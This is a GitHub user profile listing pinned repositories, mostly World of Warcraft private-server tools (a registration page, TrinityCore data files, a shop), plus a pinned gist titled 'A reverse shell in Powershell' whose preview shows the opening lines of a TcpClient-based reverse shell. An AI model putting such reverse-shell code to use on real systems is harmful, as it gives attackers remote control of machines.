Skip to content
View Haeniken's full-sized avatar
:octocat:
Hello there
:octocat:
Hello there
Block or Report

Block or report Haeniken

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. WoWSimpleRegistration WoWSimpleRegistration Public

    Forked from masterking32/WoWSimpleRegistration

    Simple Registration page for TrinityCore/AzerothCore/AshamaneCore/CMangos

    PHP

  2. TrinityCore-3.3.5-data-multilang TrinityCore-3.3.5-data-multilang Public

    dbc maps vmaps mmaps cameras: enGB deDE esES frFR ruRU

    1

  3. Azerothcore-3.3.5-Altershop Azerothcore-3.3.5-Altershop Public

    Simple altershop for TrinityCore 3.3.5 with russian localization

    4 1

  4. A reverse shell in Powershell A reverse shell in Powershell
    1
    $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
    2
    if($socket -eq $null){exit 1}
    3
    $stream = $socket.GetStream();
    4
    $writer = new-object System.IO.StreamWriter($stream);
    5
    $buffer = new-object System.Byte[] 1024;
  5. domain-check domain-check Public

    Some things

    Shell